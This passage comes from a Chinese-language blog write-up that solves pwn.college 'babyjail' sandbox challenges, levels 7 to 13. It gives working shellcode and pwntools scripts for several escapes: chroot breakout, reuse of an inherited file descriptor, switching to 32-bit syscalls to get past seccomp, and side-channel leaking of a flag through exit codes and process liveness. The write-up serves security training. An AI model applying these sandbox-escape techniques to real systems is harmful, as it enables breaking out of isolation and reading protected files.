<h3 id="level-7"><a href="#level-7" class="headerlink" title="level 7"></a>level 7</h3><p>[“chdir”, “chroot”, “mkdir”, “open”, “read”, “write”, “sendfile”]</p>
<p>因为内核只记录一个chroot，所以mkdir子目录，然后chroot子目录，就不在程序本身chroot的jail里了，此时就可以直接cd到根目录下。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">shellcraft.mkdir(<span class="string">&quot;a&quot;</span>)</span><br><span class="line">shellcraft.chroot(<span class="string">&quot;a&quot;</span>)</span><br><span class="line">shellcraft.chdir(<span class="string">&quot;../../../&quot;</span>)</span><br><span class="line">然后<span class="built_in">open</span> ， sendfile</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br></pre></td><td class="code"><pre><span class="line">.global _start</span><br><span class="line">_start:</span><br><span class="line">.intel_syntax noprefix</span><br><span class="line">    /* mkdir(path=&#x27;a&#x27;, mode=0) */</span><br><span class="line">    /* push b&#x27;a\x00&#x27; */</span><br><span class="line">    push 0x61</span><br><span class="line">    mov rdi, rsp</span><br><span class="line">    xor esi, esi /* 0 */</span><br><span class="line">    /* call mkdir() */</span><br><span class="line">    push  0x53 /* SYS_mkdir */</span><br><span class="line">    pop rax</span><br><span class="line">    syscall</span><br><span class="line"></span><br><span class="line">    /* chroot(path=&#x27;a&#x27;) */</span><br><span class="line">    /* push b&#x27;a\x00&#x27; */</span><br><span class="line">    push 0x61</span><br><span class="line">    mov rdi, rsp</span><br><span class="line">    /* setregs noop */</span><br><span class="line">    /* call chroot() */</span><br><span class="line">    xor eax, eax</span><br><span class="line">    mov al,  0xa1 /* SYS_chroot */</span><br><span class="line">    syscall</span><br><span class="line"></span><br><span class="line">    /* chdir(path=&#x27;../../../&#x27;) */</span><br><span class="line">    /* push b&#x27;../../../\x00&#x27; */</span><br><span class="line">    push 0x2f</span><br><span class="line">    mov rax, 0x2e2e2f2e2e2f2e2e</span><br><span class="line">    push rax</span><br><span class="line">    mov rdi, rsp</span><br><span class="line">    /* setregs noop */</span><br><span class="line">    /* call chdir() */</span><br><span class="line">    push  0x50 /* SYS_chdir */</span><br><span class="line">    pop rax</span><br><span class="line">    syscall</span><br><span class="line"></span><br><span class="line">    /* open(file=&#x27;flag&#x27;, oflag=0, mode=0) */</span><br><span class="line">    /* push b&#x27;flag\x00&#x27; */</span><br><span class="line">    push 0x67616c66</span><br><span class="line">    mov rdi, rsp</span><br><span class="line">    xor edx, edx /* 0 */</span><br><span class="line">    xor esi, esi /* 0 */</span><br><span class="line">    /* call open() */</span><br><span class="line">    push 0x2 /* SYS_open */</span><br><span class="line">    pop rax</span><br><span class="line">    syscall</span><br><span class="line"></span><br><span class="line">    xor r10d, r10d</span><br><span class="line">    mov r10w, 0x3e8</span><br><span class="line">    push 1</span><br><span class="line">    pop rdi</span><br><span class="line">    xor edx, edx /* 0 */</span><br><span class="line">    mov rsi,rax /* 0 */</span><br><span class="line">    /* call sendfile() */</span><br><span class="line">    push 0x28 /* 0x28 */</span><br><span class="line">    pop rax</span><br><span class="line">    syscall</span><br></pre></td></tr></table></figure>



<h3 id="level-8"><a href="#level-8" class="headerlink" title="level 8"></a>level 8</h3><p>[“openat”, “read”, “write”, “sendfile”]</p>
<p>相对于level 4 程序不打开输入的路径参数了。</p>
<p>这题的核心思路是复用父进程fd,父进程打开根目录的文件描述符。</p>
<p>然后openat(3,”flag”,0,0) 打开后sendfile</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span></span>&#123;</span><br><span class="line">	</span><br><span class="line">	<span class="type">int</span> fd = <span class="built_in">open</span>(<span class="string">&quot;/&quot;</span> ,<span class="number">0</span>);</span><br><span class="line">	</span><br><span class="line">	<span class="type">char</span> path[<span class="number">30</span>] = <span class="string">&quot;/challenge/babyjail_level8&quot;</span>;</span><br><span class="line">	<span class="type">char</span>* fargv[] = &#123;path, <span class="literal">NULL</span>&#125;;</span><br><span class="line">	<span class="type">char</span>* fenv[] =&#123;&#125;;</span><br><span class="line">	<span class="keyword">if</span>(fork()==<span class="number">0</span>)&#123;</span><br><span class="line">		</span><br><span class="line">		<span class="built_in">execve</span>(<span class="string">&quot;/challenge/babyjail_level8&quot;</span>,fargv,<span class="literal">NULL</span>);</span><br><span class="line">	&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">		<span class="built_in">sleep</span>(<span class="number">1</span>);</span><br><span class="line">		<span class="built_in">wait</span>(<span class="literal">NULL</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span> ;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="level-9"><a href="#level-9" class="headerlink" title="level 9"></a>level 9</h3><p>[“close”, “stat”, “fstat”, “lstat”]</p>
<p>int fstat(int filedes, struct stat *buf);  以文件描述符查看文件属性<br>int stat(const char *path, struct stat *buf);  </p>
<p>int lstat(const char *path, struct stat *buf);</p>
<p>stat和lstat的区别：当文件是一个符号链接时，lstat返回的是该符号链接本身的信息；而stat返回的是该链接指向的文件的信息。</p>
<p>上面给的函数好像没什么用</p>
<p>Adding architecture to seccomp filter: x86_32.</p>
<p>使用32位系统调用</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">.global _start</span><br><span class="line">_start:</span><br><span class="line">.intel_syntax noprefix</span><br><span class="line"></span><br><span class="line">    mov rsp, 0x1338000   /*这里将栈顶挪到代码附近，不然rsp的高位不为0，to32函数在开头写了原理*/</span><br><span class="line">    call to32							</span><br><span class="line">    </span><br><span class="line">    /* open(file=&#x27;/flag&#x27;, oflag=0, mode=0) */</span><br><span class="line">    /* push b&#x27;/flag\x00&#x27; */</span><br><span class="line">    push 0x67</span><br><span class="line">    push 0x616c662f</span><br><span class="line">    mov ebx, esp</span><br><span class="line">    xor ecx, ecx</span><br><span class="line">    xor edx, edx</span><br><span class="line">    /* call open() */</span><br><span class="line">    mov eax,0x5 /* SYS_open */</span><br><span class="line">    int 0x80</span><br><span class="line"></span><br><span class="line">    /* sendfile(out_fd=1, in_fd=open的结果, offset=0, count=0x3e8) */</span><br><span class="line">    mov ebx,1</span><br><span class="line">    mov ecx,eax</span><br><span class="line">    xor edx, edx</span><br><span class="line">    xor esi, esi</span><br><span class="line">    mov si, 0x3e8</span><br><span class="line">    /* call sendfile() */</span><br><span class="line">    xor eax, eax</span><br><span class="line">    mov al, 0xbb</span><br><span class="line">    int 0x80</span><br><span class="line">    </span><br><span class="line">to32:</span><br><span class="line">    mov dword ptr [rsp + 4], 0x23    /* 23000000 00803301 /*</span><br><span class="line">    retf 															/*pop eip 00803301   pop cs 23000000 */</span><br><span class="line">																				/*这样就让cs的值为0x23/*    </span><br></pre></td></tr></table></figure>

<h3 id="level-10-11-12-侧信道爆破"><a href="#level-10-11-12-侧信道爆破" class="headerlink" title="level 10  11 12  侧信道爆破"></a>level 10  11 12  侧信道爆破</h3><p>[“read”, “exit”].</p>
<p>侧信道爆破,用p.connected()来判断程序是否退出。在每次字符爆破成功时都会死循环，所以返回True代表成功，接着进行下一个字符爆破。</p>
<p>脚本很慢且会报错，报错的地方先用@填充了然后重新运行脚本改index参数，把flag补齐。</p>
<p>三题都可以用这个脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> * </span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line">context.arch = <span class="string">&quot;amd64&quot;</span></span><br><span class="line">context.log_level = <span class="string">&quot;info&quot;</span></span><br><span class="line"></span><br><span class="line">shellcode = shellcraft.read(<span class="number">3</span>, <span class="number">0x1337500</span>, <span class="number">0x50</span>) </span><br><span class="line">shellcode += <span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">    mov rax,0x1337500</span></span><br><span class="line"><span class="string">    mov bl,byte ptr [rax+&#123;&#125;]</span></span><br><span class="line"><span class="string">    cmp bl,&#123;&#125;</span></span><br><span class="line"><span class="string">    je $-3</span></span><br><span class="line"><span class="string">    &#x27;&#x27;&#x27;</span></span><br><span class="line">index = <span class="number">0</span></span><br><span class="line">flag = <span class="string">&quot;&quot;</span></span><br><span class="line">alist = [a <span class="keyword">for</span> a  <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">127</span>, <span class="number">31</span>, -<span class="number">1</span>)]  <span class="comment">#字符范围</span></span><br><span class="line">p = <span class="literal">None</span></span><br><span class="line"><span class="keyword">while</span> <span class="number">1</span>:</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> alist:</span><br><span class="line">            <span class="keyword">if</span> <span class="built_in">isinstance</span>(p, process):</span><br><span class="line">                p.kill()       </span><br><span class="line">            p = process([<span class="string">&quot;/challenge/babyjail_level10&quot;</span>,<span class="string">&quot;/flag&quot;</span>])</span><br><span class="line"></span><br><span class="line">            p.sendline(asm(shellcode.<span class="built_in">format</span>(index,i)))   </span><br><span class="line">            time.sleep((<span class="number">0.2</span>)) <span class="comment">#这里不sleep的话程序还不及退出，导致两种情况都反回 True</span></span><br><span class="line">            judge = p.connected()</span><br><span class="line">            p.kill()</span><br><span class="line">            <span class="built_in">print</span>(index)</span><br><span class="line">            <span class="keyword">if</span> judge:</span><br><span class="line">                index += <span class="number">1</span></span><br><span class="line">                flag += <span class="built_in">chr</span>(i)</span><br><span class="line">                <span class="built_in">print</span>(flag)</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                <span class="keyword">pass</span></span><br><span class="line">        <span class="keyword">if</span> <span class="string">&quot;&#125;&quot;</span> <span class="keyword">in</span> flag:</span><br><span class="line">            <span class="keyword">break</span>   </span><br><span class="line">    <span class="keyword">except</span>:</span><br><span class="line">        index += <span class="number">1</span></span><br><span class="line">        flag += <span class="string">&quot;@&quot;</span></span><br><span class="line">        <span class="built_in">print</span>(flag)</span><br><span class="line">        <span class="keyword">continue</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>



<p>level10 可以调用exit 下面<strong>利用exit泄漏信息</strong></p>
<p><code>void exit(int status);</code> exit可以指定一个退出状态码，将它指向flag的区域，逐个泄漏。</p>
<pre><code>p.wait_for_close()   #等待进程退出
a = p.poll()				#获取进程退出的状态码
</code></pre>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">######.  level10 writeup</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> * </span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line">context.arch = <span class="string">&quot;amd64&quot;</span></span><br><span class="line"><span class="comment">#context.log_level = &quot;info&quot;</span></span><br><span class="line"></span><br><span class="line">shellcode = shellcraft.read(<span class="number">3</span>, <span class="number">0x1337500</span>, <span class="number">0x50</span>) </span><br><span class="line">shellcode += <span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">    mov rdi,[0x1337500+&#123;&#125;]</span></span><br><span class="line"><span class="string">    mov rax,60</span></span><br><span class="line"><span class="string">    syscall</span></span><br><span class="line"><span class="string">    &#x27;&#x27;&#x27;</span></span><br><span class="line">index = <span class="number">0</span></span><br><span class="line">flag = <span class="string">&quot;&quot;</span></span><br><span class="line"><span class="keyword">while</span> <span class="number">1</span>:</span><br><span class="line">    p = process([<span class="string">&quot;/challenge/babyjail_level10&quot;</span>,<span class="string">&quot;/flag&quot;</span>])</span><br><span class="line">    p.sendline(asm(shellcode.<span class="built_in">format</span>(index)))   </span><br><span class="line">    p.wait_for_close()</span><br><span class="line">    a = p.poll()</span><br><span class="line">    flag += <span class="built_in">chr</span>(a)</span><br><span class="line">    index +=<span class="number">1</span></span><br><span class="line">    <span class="built_in">print</span>(flag)</span><br><span class="line">    <span class="keyword">if</span> <span class="string">&quot;&#125;&quot;</span> <span class="keyword">in</span> flag:</span><br><span class="line">        <span class="keyword">break</span></span><br></pre></td></tr></table></figure>



<h3 id="level13"><a href="#level13" class="headerlink" title="level13"></a>level13</h3><figure class="highlight applescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">This challenge will fork <span class="keyword">into</span> a jail. Inside <span class="keyword">of</span> <span class="keyword">the</span> child process&#x27; jail, you will only be able <span class="keyword">to</span> communicate <span class="keyword">with</span> <span class="keyword">the</span></span><br><span class="line">parent process. If you want <span class="keyword">the</span> flag, you must convince <span class="keyword">the</span> parent process <span class="keyword">to</span> give <span class="keyword">it</span> <span class="keyword">to</span> you.</span><br><span class="line"></span><br><span class="line">Creating a `socketpair` <span class="keyword">that</span> <span class="keyword">the</span> child <span class="keyword">and</span> parent will use <span class="keyword">to</span> communicate. This <span class="keyword">is</span> a pair <span class="keyword">of</span> <span class="built_in">file</span> descriptors <span class="keyword">that</span> are</span><br><span class="line">connected: data written <span class="keyword">to</span> one can be <span class="built_in">read</span> <span class="keyword">from</span> <span class="keyword">the</span> other, <span class="keyword">and</span> vice-versa.</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> * </span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line">context.arch = <span class="string">&quot;amd64&quot;</span></span><br><span class="line"><span class="comment">#context.log_level = &quot;debug&quot;</span></span><br><span class="line">p = process(<span class="string">&quot;/challenge/babyjail_level13&quot;</span>)</span><br><span class="line"></span><br><span class="line">shellcode = shellcraft.write(<span class="number">4</span>,<span class="string">&quot;read_file:/flag&quot;</span>,<span class="number">20</span>)</span><br><span class="line">shellcode += shellcraft.read(<span class="number">4</span>,<span class="string">&quot;rsp&quot;</span>,<span class="number">100</span>)</span><br><span class="line">shellcode += <span class="string">&quot;&quot;&quot; </span></span><br><span class="line"><span class="string">    /* push b&#x27;print_msg:######   必须push8个字节不然有0会中断输出*/ </span></span><br><span class="line"><span class="string">    mov rax, 0x2323232323233a67</span></span><br><span class="line"><span class="string">    push rax</span></span><br><span class="line"><span class="string">    mov rax, 0x736d5f746e697270</span></span><br><span class="line"><span class="string">    push rax</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line">shellcode += shellcraft.write(<span class="number">4</span>,<span class="string">&quot;rsp&quot;</span>,<span class="number">100</span>)</span><br><span class="line">p.sendline(asm(shellcode))</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/PwnCollege/" rel="tag"># PwnCollege</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/11/23/Shellcode-Injection/" rel="prev" title="Shellcode Injection">
      <i class="fa fa-chevron-left"></i> Shellcode Injection
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#chroot"><span class="nav-text">chroot</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#openat-linkat"><span class="nav-text">openat linkat</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#seccomp"><span class="nav-text">seccomp</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%BB%95%E8%BF%87%E6%9C%AA%E6%A3%80%E6%9F%A5arch"><span class="nav-text">绕过未检查arch</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#X64%E4%B8%8B%E4%BD%BF%E7%94%A8-X32"><span class="nav-text">X64下使用 X32</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%B5%8B%E4%BF%A1%E9%81%93%E7%88%86%E7%A0%B4"><span class="nav-text">测信道爆破</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BB%80%E4%B9%88%E6%98%AF%E4%BE%A7%E4%BF%A1%E9%81%93%E7%88%86%E7%A0%B4%EF%BC%9F"><span class="nav-text">什么是侧信道爆破？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BE%A7%E4%BF%A1%E9%81%93%E7%88%86%E7%A0%B4%E7%9A%84%E6%95%B4%E4%BD%93%E6%80%9D%E8%B7%AF"><span class="nav-text">侧信道爆破的整体思路:</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%A2%98%E7%9B%AE"><span class="nav-text">题目</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#level-1-chroot"><span class="nav-text">level 1  chroot</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level-2"><span class="nav-text">level 2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level-3"><span class="nav-text">level 3</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level-4-seccomp"><span class="nav-text">level 4 seccomp</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link"><span class="nav-text"></span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level-5"><span class="nav-text">level 5</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level-6"><span class="nav-text">level 6</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level-7"><span class="nav-text">level 7</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level-8"><span class="nav-text">level 8</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level-9"><span class="nav-text">level 9</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level-10-11-12-%E4%BE%A7%E4%BF%A1%E9%81%93%E7%88%86%E7%A0%B4"><span class="nav-text">level 10  11 12  侧信道爆破</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level13"><span class="nav-text">level13</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="dreamfoil"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">dreamfoil</p>
  <div class="site-description" itemprop="description">独立之精神，自由之思想。</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">17</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="mailto:1224825643@qq.com" title="E-Mail → mailto:1224825643@qq.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">dreamfoil</span>
</div>

 <!--
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div> -->

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
